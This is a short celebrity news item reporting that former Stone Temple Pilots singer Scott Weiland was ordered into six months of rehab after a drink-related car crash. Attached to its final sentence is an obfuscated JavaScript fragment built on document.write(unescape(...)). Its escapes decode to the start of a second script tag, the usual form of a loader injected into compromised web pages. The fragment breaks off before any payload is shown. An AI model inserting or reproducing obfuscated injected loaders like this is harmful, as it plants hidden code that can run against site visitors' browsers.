Further to our previous report, Scott Weiland, former Stone Temple Pilots frontman, has been ordered to spend six months in rehab following his arrest last week for crashing his car and fleeing the scene while reportedly under the influence.
The Velvet Revolver frontman will be allowed to complete the album he is currently recording, but will undergo manditory drug tests on a daily basis. Weiland will be taken to the recording studio by a police officer and tested for drugs immediately on his return.
The wildman singer is already undergoing a different course of counselling, following a recent history of drug and alcohol related problems. The car crash came at the end of a day celebrating his birthday.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
